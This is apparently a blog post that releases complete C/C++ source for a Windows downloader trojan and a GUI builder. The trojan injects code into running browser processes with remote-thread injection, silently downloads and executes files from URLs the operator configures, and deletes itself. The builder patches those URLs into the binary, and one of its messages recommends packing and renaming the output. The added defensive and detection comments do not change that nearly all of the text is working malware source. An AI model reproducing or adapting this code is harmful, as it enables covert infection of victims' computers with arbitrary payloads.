这是本人大学期间写的,对于现在的win7已经无效,且已经能被查杀,所以放出源码供大伙参考下。
还有个生成器,可以指定需要下载的其他病毒,然后生成下载者病毒。
转载请注明出处uxyheaven csdn博客
基本思路是
step1
提权
step2
得到指定函数的指针
step3
打开目标进程(这里用的是浏览器的进程)
step4
把病毒的线程写入宿主进程里
step5
让宿主进程执行病毒线程
step6
病毒线程从网上下载特定的文件并且执行
/************************************************************
 * Some Rights Reserved: Xing Yao
 * File:        downer.h
 * Brief:       function declarations and struct definitions
 * Author:      邢尧 (Xing Yao)
 * Version:     vX.y
 * Modified by: 邢尧
 * Completed:   2008/11/14
 * Revision:    rewrote the implementation - the original injected a
 *              DLL and let the DLL start the remote thread; this
 *              version writes the code straight into the process.
 ************************************************************/
// downer.h : header for the downloader "server" (the dropper side).
//
// Reviewer orientation (defensive): this header defines the control block
// that main() in downer.cpp fills and Insert() copies into a browser
// process, plus the placeholder table the generator patches. Nothing here
// executes on its own; downer.cpp holds the privilege / process / memory /
// thread call sequence that detection engines key on.
#include <windows.h>
// TODO: reference any other headers the program needs here
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" ) // set the entry point and hide the console window
// Use version 6.0 of Common-Controls
#pragma comment(linker,"/manifestdependency:\"type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*'\"")
/*
// custom libraries to load
#pragma comment(lib,"kernel32.lib")
#pragma comment(lib,"shell32.lib")
#pragma comment(lib,"msvcrt.lib")
// custom entry point
//#pragma comment(linker, "/ENTRY:EntryPoint")
// custom alignment
#pragma comment(linker, "/align:64")
// merge sections
#pragma comment(linker, "/merge:.rdata=.data")
#pragma comment(linker, "/merge:.text=.data")
//#pragma comment(linker, "/MERGE:.reloc=.data")
*/
// Data block carried to the injected thread.
// The copied thread body (DownFiles) runs inside another process and has
// no import table of its own, so every API it calls is handed over as an
// already-resolved address (dw* fields) next to the string argument it
// needs (p* fields). main() in downer.cpp populates dwMessageBox,
// dwShellExecute, dwURLDownloadToFile, dwDeleteFile, dwSleep,
// pShellExecute, pDeleteFile and the virus* tables; the LoadLibrary /
// GetProcAddress / pMessageBox fields are declared but not filled in
// this listing.
typedef struct THREADDATA{
    int iSize;                  // size of the code region allocated in the target
    char pMessageBox[16];       // MessageBox argument 2 or 3, debugging only
    DWORD dwMessageBox;         // MessageBox entry address
    char pLoadLibrary[16];      // LoadLibrary argument 1 (not populated here)
    DWORD dwLoadLibrary;        // LoadLibrary entry address (not populated here)
    char pGetProcAddress[16];   // argument 2 (original comment says LoadLibrary; not populated here)
    DWORD dwGetProcAddress;     // GetProcAddress entry address (not populated here)
    char pShellExecute[16];     // ShellExecute argument 2, the verb; main() stores "open"
    DWORD dwShellExecute;       // ShellExecute entry address
    DWORD dwURLDownloadToFile;  // URLDownloadToFile entry address
    char pDeleteFile[MAX_PATH]; // DeleteFile argument 1: the dropper's own path (GetModuleFileName)
    DWORD dwDeleteFile;         // DeleteFile entry address
    DWORD dwSleep;              // Sleep entry address
    char virusURL[4][64];       // download URLs, one per slot
    char virusFile[4][64];      // local file names, one per slot
}pTHREADDATA; // NOTE: despite the 'p' prefix this names the struct itself, not a pointer to it
// Browser process names tried as injection hosts, in order. Five of the
// eight slots are initialised, the rest are zero-filled; main() in
// downer.cpp walks the first four entries.
const char processName[8][16] = {"iexplore.exe", "IEXPLORE.EXE", "TheWorld.exe", "Maxthon.exe", "TTraveler.exe"};
// Placeholder table: slot 2k is a URL, slot 2k+1 the file name it is saved
// under, each 64 bytes. Every placeholder starts with '*', which DownFiles
// treats as "empty slot, skip". The generator (CDownerReginaDlg::CreatResFile)
// overwrites these 64-byte slots in the built binary at fixed file offsets,
// so in a generated sample the URLs and file names sit here in plain text
// and are recoverable with a plain strings scan.
const char virus[8][64] = {"*0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0A0", "*1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1A1",
"*0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0B0", "*1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1B1", "*0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0C0", "*1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1C1", "*0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0", "*1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1D1"};
// Raise this process to DEBUG privilege (SeDebugPrivilege)
BOOL EnablePriv(void);
// Get the process ID for an executable name (0 if not found)
DWORD GetProcID(char* processName);
// Write the thread body and its data into a process and start it there
bool Insert(char* processName, THREADDATA &threadData);
// Drop an embedded resource to a file (declared here; the generator defines
// its own member-function version in DownerReginaDlg.cpp)
void CreatResFile(char* flieName, WORD resName, LPCTSTR resType);
// Self-delete (left empty in downer.cpp)
void KillMe(void);
// Remote download routine; this is the code that gets copied into the host
DWORD WINAPI DownFiles(THREADDATA &threadData);
//static void BreakPoint1 (void){}
// downer.cpp : defines the entry point of the console application.
//
// Defensive summary of the flow implemented below. Each step is an ordinary,
// documented Windows API call, and together they form the sequence that
// endpoint telemetry flags as classic remote-thread injection:
//   1. EnablePriv()  - AdjustTokenPrivileges(SeDebugPrivilege) on itself
//   2. main()        - resolve API addresses with LoadLibrary/GetProcAddress
//   3. GetProcID()   - Toolhelp snapshot lookup of a browser process by name
//   4. Insert()      - OpenProcess(VM_WRITE|VM_OPERATION|CREATE_THREAD) ->
//                      VirtualAllocEx(PAGE_EXECUTE_READWRITE) ->
//                      WriteProcessMemory (code, then data) -> CreateRemoteThread
//   5. DownFiles()   - inside the browser: URLDownloadToFile, ShellExecute with
//                      SW_HIDE, Sleep(1500), DeleteFile on the dropper's own path
// Artefacts for responders: a 4 KiB RWX private region in the browser holding
// a byte copy of DownFiles, a small RW region holding THREADDATA (URLs, file
// names and the dropper path in clear), download and child-process activity
// attributed to the browser process, and a dropper binary that is removed
// roughly 1.5 s after the remote thread starts.
//#include "stdafx.h"
#include "downer.h"
#include <Tlhelp32.h>
int main(int argc, char* argv[])
{
    // raise privileges
    EnablePriv();
    // initialise the control block handed to the injected thread
    THREADDATA threadData;
    ::ZeroMemory(&threadData, sizeof(THREADDATA));
    /**/
    // Resolve every API the remote thread will call. The addresses are taken
    // from this process; the code relies on the same DLLs being mapped at the
    // same base in the target (true for system DLLs within one boot session).
    HINSTANCE hUser32 = ::LoadLibrary ("user32.dll");
    threadData.dwMessageBox = (DWORD)::GetProcAddress(hUser32 , "MessageBoxA");
    //::CopyMemory(threadData.pMessageBox, "hello\0", 16);
    HINSTANCE hShell32 = LoadLibrary("Shell32.dll");
    threadData.dwShellExecute = (DWORD)::GetProcAddress(hShell32, "ShellExecuteA");
    ::CopyMemory(threadData.pShellExecute, "open\0", 16); // ShellExecute verb
    HINSTANCE hUrlmon = ::LoadLibrary ("urlmon.dll");
    threadData.dwURLDownloadToFile = (DWORD)::GetProcAddress(hUrlmon, "URLDownloadToFileA");
    HINSTANCE hKernel32 = ::LoadLibrary ("Kernel32.dll");
    threadData.dwDeleteFile = (DWORD)::GetProcAddress(hKernel32, "DeleteFileA");
    // The dropper's own path is carried along so the remote thread can delete it
    // after launching the payloads (anti-forensics; see DownFiles).
    char lpFileName[MAX_PATH];
    ::GetModuleFileName(NULL, lpFileName, MAX_PATH);
    ::CopyMemory(threadData.pDeleteFile, lpFileName, MAX_PATH);
    threadData.dwSleep = (DWORD)::GetProcAddress(hKernel32, "Sleep");
    // Copy the (generator-patched) URL / file-name slots from the virus table
    for (int i = 0; i < 4; i++)
    {
        ::CopyMemory(threadData.virusURL[i], virus[i * 2], 64);
        ::CopyMemory(threadData.virusFile[i], virus[i * 2 + 1], 64);
        //::MessageBoxA(NULL, threadData.virusURL[i], threadData.virusFile[i], NULL);
    }
    // Inject the code into the first browser process found, then execute it
    for (int i = 0; i < 4; i++)
    {
        //::MessageBox(NULL, (char *)processName[i], NULL, NULL);
        if (Insert((char *)processName[i], threadData))
        {
            break;
        }
    }
    //KillMe();
    return 0;
}
// Enable SeDebugPrivilege on the current process token, intended to let the
// later OpenProcess obtain the access rights Insert() asks for.
// Returns the result of a GetLastError()==ERROR_SUCCESS check after the
// adjust call; falls through to TRUE when the token cannot be opened at all.
// Detection note: a non-debugger process enabling SeDebugPrivilege shortly
// before opening a browser process is a common hunting signal.
BOOL EnablePriv() // raise privileges
{
    HANDLE hToken;
    if ( OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken) )
    {
        TOKEN_PRIVILEGES tkp;
        LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid ); // look up the privilege LUID
        tkp.PrivilegeCount=1;
        tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
        AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ); // ask the system to enable it
        return( (GetLastError() == ERROR_SUCCESS) );
    }
    return TRUE;
}
// Get the process ID for an executable name.
// Walks a Toolhelp process snapshot and returns the th32ProcessID of the
// first entry whose executable name compares equal to processName.
DWORD GetProcID(char* processName)
{
    // returns 0 if no such process exists;
    // processName: the .exe file name.
    HANDLE th = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    PROCESSENTRY32 pe = {sizeof(pe)};
    DWORD dwProcID = 0;
    BOOL bOK = Process32First(th, &pe);
    while (bOK)
    {
        bOK = Process32Next(th, &pe);
        LPCTSTR lpszExeFile = strrchr(pe.szExeFile, '//');
        if(lpszExeFile == NULL)
            lpszExeFile = pe.szExeFile;
        else
            lpszExeFile++;
        if (strcmp(processName, (char *)lpszExeFile) == 0)
        {
            dwProcID = pe.th32ProcessID;
            break;
        }
    }
    return dwProcID;
}
// Write the thread body and its data into the named process and start it.
// Returns false if any step before CreateRemoteThread fails, true otherwise
// (the CreateRemoteThread result itself is not checked).
// What lands in the target: a PAGE_EXECUTE_READWRITE region of iSize (4 KiB)
// bytes copied verbatim from &DownFiles - i.e. whatever follows DownFiles in
// this image, not the function's exact length - and a separate PAGE_READWRITE
// region holding a copy of threadData. Both are visible as private, non-image
// memory in a dump of the browser process.
bool Insert(char* processName, THREADDATA &threadData)
{
    HANDLE hProcess = NULL;
    // open the target process
    DWORD dwProcessId = GetProcID(processName);
    hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwProcessId);
    if(NULL == hProcess)
    {
        //::MessageBox(NULL, "OpenProcess Error!", NULL, NULL);
        return false;
    }
    //::MessageBox(NULL, processName, NULL, NULL);
    // allocate the code region
    threadData.iSize = 1024 * 4; // thread body size provisionally fixed at 4K
    void *pThreadCode = ::VirtualAllocEx(hProcess, NULL, threadData.iSize, MEM_COMMIT| MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (NULL == pThreadCode)
    {
        //::MessageBox(NULL, "Code VirtualAllocEx Error!", NULL, NULL);
        return false;
    }
    // write the code
    if(!::WriteProcessMemory(hProcess, pThreadCode, &DownFiles, threadData.iSize, 0))
    {
        //::MessageBox(NULL, "Code WriteProcessMemory Error!", NULL, NULL);
        return false;
    }
    // allocate the data region
    pTHREADDATA *pThreadData = (THREADDATA*)::VirtualAllocEx(hProcess, NULL, sizeof(THREADDATA), MEM_COMMIT, PAGE_READWRITE);
    if (NULL == pThreadData)
    {
        //::MessageBox(NULL, "Data VirtualAllocEx Error!", NULL, NULL);
        return false;
    }
    // write the data
    if( !::WriteProcessMemory(hProcess, pThreadData, &threadData, sizeof(THREADDATA), 0))
    {
        //::MessageBox(NULL, "Data WriteProcessMemory Error!", NULL, NULL);
        return false;
    }
    // start the remote thread; pThreadData becomes DownFiles' argument
    CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pThreadCode, pThreadData, 0, NULL);
    return true;
}
// Self-delete hook. Empty here: the actual deletion is done by DownFiles from
// inside the host process, and the call in main() is commented out.
void KillMe(void)
{
}
// Remote download routine.
// This function's bytes are copied verbatim into the host process (see
// Insert), so it must not touch the dropper's imports or globals: every API
// is reached through the addresses carried in threadData, turned back into
// function pointers via the (FARPROC&) reinterpretation below.
// threadData is the CreateRemoteThread parameter - a pointer in Insert(), a
// reference here. NOTE(review): this relies on the compiler passing a
// reference as a plain pointer; confirm for the toolchain used.
// Behaviour: for every slot whose URL does not start with '*', download the
// URL to virusFile[i] and ShellExecute it hidden; then wait 1.5 s and delete
// the dropper at pDeleteFile. All of this runs under the browser's identity.
DWORD WINAPI DownFiles(THREADDATA &threadData)
{
    // dynamically bind MessageBoxA
    /*
    typedef int (__stdcall *MYMessageBoxA)(HWND, LPCTSTR, LPCTSTR, DWORD);// MessageBox function type
    MYMessageBoxA myMessageBoxA;
    myMessageBoxA =(MYMessageBoxA)threadData.dwMessageBox;// obtain the function entry address
    */
    // i is always 1, so the goto is never taken; MYMessageBox is bound even
    // though its only call site is commented out (debug leftover).
    int i = 1;
    if (i != 1) goto start;
    HINSTANCE (WINAPI *MYMessageBox)(HWND, LPCTSTR, LPCTSTR, DWORD); // MessageBox function pointer
    (FARPROC&)MYMessageBox = (FARPROC&)threadData.dwMessageBox;
    //MYMessageBox(NULL, threadData.pMessageBox ,NULL, NULL);
    // dynamically bind ShellExecute
start:HINSTANCE (WINAPI *MYShellExecute)(HWND, LPCTSTR, LPCTSTR, LPCTSTR ,LPCTSTR, int);
    (FARPROC&)MYShellExecute = (FARPROC&)threadData.dwShellExecute;
    // dynamically bind URLDownloadToFile
    DWORD (WINAPI *MYURLDownloadToFile)(LPCTSTR, LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);
    (FARPROC&)MYURLDownloadToFile = (FARPROC&)threadData.dwURLDownloadToFile;
    // dynamically bind DeleteFile
    DWORD (WINAPI *MYDeleteFile)(LPCTSTR);
    (FARPROC&)MYDeleteFile = (FARPROC&)threadData.dwDeleteFile;
    // dynamically bind Sleep
    DWORD (WINAPI *MYSleep)(DWORD);
    (FARPROC&)MYSleep = (FARPROC&)threadData.dwSleep;
    for (int i = 0; i < 4; i++)
    {
        //MYMessageBox(NULL, threadData.virusURL[i] , threadData.virusFile[i], NULL);
        // a slot still holding its '*' placeholder was never patched by the generator
        if (threadData.virusURL[i][0] != '*'){
            MYURLDownloadToFile(NULL, threadData.virusURL[i], threadData.virusFile[i], NULL, NULL);
            MYShellExecute(NULL, threadData.pShellExecute, threadData.virusFile[i], NULL, NULL, SW_HIDE);
        }
    }
    //MYMessageBox(NULL, threadData.pDeleteFile, NULL, NULL);
    // remove the dropper binary from disk after a short delay
    MYSleep(1500);
    MYDeleteFile(threadData.pDeleteFile);
    return 0;
}
//static void BreakPoint1 (void){}
生成器
// DownerReginaDlg.cpp : implementation file
//
// Builder ("generator") dialog. It does not run the downloader itself; it
// extracts the pre-built server.exe from its own resources
// (IDR_EXERES_DOWNER, type "EXERES") and patches the URL / file-name pairs
// typed into the dialog into that image at fixed file offsets (see
// CreatResFile at the bottom). For analysts this means a generated
// server.exe carries its configuration unencrypted at the patched offsets,
// and the builder binary itself embeds an unpatched copy of the dropper as
// a resource.
#include "stdafx.h"
#include "DownerRegina.h"
#include "DownerReginaDlg.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
// CAboutDlg dialog used for the application's "About" menu item
class CAboutDlg : public CDialog
{
public:
    CAboutDlg();
    // dialog data
    enum { IDD = IDD_ABOUTBOX };
protected:
    virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV support
    // implementation
protected:
    DECLARE_MESSAGE_MAP()
};
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
}
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
    CDialog::DoDataExchange(pDX);
}
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
END_MESSAGE_MAP()
// CDownerReginaDlg dialog
CDownerReginaDlg::CDownerReginaDlg(CWnd* pParent /*=NULL*/) : CDialog(CDownerReginaDlg::IDD, pParent)
{
    m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}
// Bind the two rich-edit controls: one line per URL, one line per target file name.
void CDownerReginaDlg::DoDataExchange(CDataExchange* pDX)
{
    CDialog::DoDataExchange(pDX);
    DDX_Control(pDX, IDC_RICHEDIT2_VIRUSURL, m_virusURL);
    DDX_Control(pDX, IDC_RICHEDIT2_VIRUSPATH, m_virusPath);
}
BEGIN_MESSAGE_MAP(CDownerReginaDlg, CDialog)
    ON_WM_SYSCOMMAND()
    ON_WM_PAINT()
    ON_WM_QUERYDRAGICON()
    //}}AFX_MSG_MAP
    ON_BN_CLICKED(IDC_BUTTON_BUILD, &CDownerReginaDlg::OnBnClickedButtonBuild)
    ON_BN_CLICKED(IDC_BUTTON_ABOUT, &CDownerReginaDlg::OnBnClickedButtonAbout)
END_MESSAGE_MAP()
// CDownerReginaDlg message handlers
// Standard MFC wizard boilerplate: adds the "About..." item to the system
// menu and sets the dialog icons.
BOOL CDownerReginaDlg::OnInitDialog()
{
    CDialog::OnInitDialog();
    // Add the "About..." menu item to the system menu.
    // IDM_ABOUTBOX must be in the system command range.
    ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
    ASSERT(IDM_ABOUTBOX < 0xF000);
    CMenu* pSysMenu = GetSystemMenu(FALSE);
    if (pSysMenu != NULL)
    {
        BOOL bNameValid;
        CString strAboutMenu;
        bNameValid = strAboutMenu.LoadString(IDS_ABOUTBOX);
        ASSERT(bNameValid);
        if (!strAboutMenu.IsEmpty())
        {
            pSysMenu->AppendMenu(MF_SEPARATOR);
            pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
        }
    }
    // Set the icon for this dialog. The framework does this automatically
    // when the application's main window is not a dialog.
    SetIcon(m_hIcon, TRUE); // set big icon
    SetIcon(m_hIcon, FALSE); // set small icon
    // TODO: add extra initialisation here
    return TRUE; // return TRUE unless you set the focus to a control
}
// Route the custom "About" system command; everything else goes to CDialog.
void CDownerReginaDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
    if ((nID & 0xFFF0) == IDM_ABOUTBOX)
    {
        CAboutDlg dlgAbout;
        dlgAbout.DoModal();
    }
    else
    {
        CDialog::OnSysCommand(nID, lParam);
    }
}
// If you add a minimize button to your dialog, you will need the code below
// to draw the icon. For MFC applications using the document/view model,
// this is automatically done for you by the framework.
void CDownerReginaDlg::OnPaint()
{
    if (IsIconic())
    {
        CPaintDC dc(this); // device context for painting
        SendMessage(WM_ICONERASEBKGND, reinterpret_cast<WPARAM>(dc.GetSafeHdc()), 0);
        // center icon in client rectangle
        int cxIcon = GetSystemMetrics(SM_CXICON);
        int cyIcon = GetSystemMetrics(SM_CYICON);
        CRect rect;
        GetClientRect(&rect);
        int x = (rect.Width() - cxIcon + 1) / 2;
        int y = (rect.Height() - cyIcon + 1) / 2;
        // draw the icon
        dc.DrawIcon(x, y, m_hIcon);
    }
    else
    {
        CDialog::OnPaint();
    }
}
// The system calls this function to obtain the cursor to display while the
// user drags the minimized window.
HCURSOR CDownerReginaDlg::OnQueryDragIcon()
{
    return static_cast<HCURSOR>(m_hIcon);
}
// "Build" button: validates that the URL and path lists have the same number
// of lines and at most four entries (the slot count in downer.h), then writes
// a patched server.exe into the current directory. CreatResFile's return
// value is not checked, so the success message is shown regardless.
void CDownerReginaDlg::OnBnClickedButtonBuild()
{
    // TODO: add your control notification handler code here
    UpdateData(true);
    if (m_virusURL.GetLineCount() != m_virusPath.GetLineCount())
    {
        ::MessageBox(NULL, "URL与Path总数不一致,请检查,注意最后一行不用输入回车!", NULL, NULL);
        return;
    }
    if (m_virusURL.GetLineCount() > 4)
    {
        ::MessageBox(NULL, "抱歉bate1版目前只支持4个!", NULL, NULL);
        return;
    }
    CreatResFile("server.exe", IDR_EXERES_DOWNER, "EXERES");
    /*
    CString buf;
    CString buf2;
    int size;
    m_virusURL.GetWindowTextA(buf);
    buf += "\r\n";
    m_virusPath.GetWindowTextA(buf2);
    buf += buf2;
    buf += "\r\n";
    buf += (char*)m_virusURL.GetLineCount();
    CFile file("server.exe", CFile::modeWrite);
    file.SeekToEnd();
    file.Write(buf, buf.GetLength());
    size = m_virusURL.GetLineCount();
    file.Write(&size, sizeof(int));
    size = buf.GetLength() + 8;
    file.Write(&size, sizeof(int));
    */
    ::MessageBox(NULL, "server.exe已生成,建议加壳、改名使用!", NULL, NULL);
    UpdateData(false);
}
void CDownerReginaDlg::OnBnClickedButtonAbout()
{
    // TODO: add your control notification handler code here
    CAboutDlg dlgAbout;
    dlgAbout.DoModal();
}
// Drop an embedded resource to disk after patching in the URL / file-name
// pairs typed into the dialog.
//   flieName : output path (spelling as in the original)
//   resName  : resource id, passed through MAKEINTRESOURCE
//   resType  : resource type string
// Returns true when a step failed and false on success (note the inverted
// sense; the caller ignores it).
// The patch offsets start at 0x11B8 and advance 0x40 per string, i.e. the
// 64-byte slots of the `virus` table in downer.h (URL, then file name, per
// pair). Presumably the layout is tied to one specific build of server.exe.
// For analysis: the same offsets locate the configuration in a sample.
bool CDownerReginaDlg::CreatResFile(char* flieName, WORD resName, LPCTSTR resType)
{
    HRSRC hResInfo;
    HGLOBAL hResData;
    DWORD dwSize, dwWritten;
    LPBYTE p;
    HANDLE hFile;
    // locate the required resource
    hResInfo = FindResource(NULL, MAKEINTRESOURCE(resName), resType);
    if (hResInfo == NULL)
    {
        ::MessageBox(NULL, "查找资源失败!", NULL, NULL);
        return true;
    }
    dwSize = SizeofResource(NULL, hResInfo); // get the resource size
    hResData = LoadResource(NULL, hResInfo); // load the resource
    if(hResData == NULL)
    {
        ::MessageBox(NULL, "装载失败!", NULL, NULL);
        return true;
    }
    p = (LPBYTE)GlobalAlloc(GPTR, dwSize); // allocate space for the data
    if (p == NULL)
    {
        ::MessageBox(NULL,"分配内存失败!", NULL, NULL);
        return true;
    }
    ::CopyMemory((LPVOID)p, (LPCVOID)LockResource(hResData), dwSize);
    hFile = CreateFile(flieName, GENERIC_WRITE | CREATE_ALWAYS, 0, NULL, CREATE_ALWAYS,0, NULL); // copy of the resource data goes here
    // patch the resource image in memory
    char buf[64];
    int address = 0x11B8 - 0x40; // first slot is at 0x11B8 after the initial += 0x40
    for (int i = 0; i < m_virusURL.GetLineCount(); i++)
    {
        // URL line i -> slot 2i
        m_virusURL.GetLine(i, buf, 64);
        buf[strlen(buf) - 1] = '\0';
        address += 0x40;
        ::CopyMemory((LPVOID)(p + address), buf, 64);
        // file-name line i -> slot 2i+1
        m_virusPath.GetLine(i, buf, 64);
        buf[strlen(buf) - 1] = '\0';
        address += 0x40;
        ::CopyMemory((LPVOID)(p + address), buf, 64);
    }
    if(hFile != NULL)
    {
        WriteFile(hFile, (LPCVOID)p, dwSize, &dwWritten, NULL); // create the file and write the data
    }
    else
    {
        ::MessageBox(NULL, "创建文件失败!", NULL, NULL);
        ::GlobalFree((HGLOBAL)p);
        return true;
    }
    CloseHandle(hFile);
    // clean-up, release resources
    ::GlobalFree((HGLOBAL)p);
    return false;
}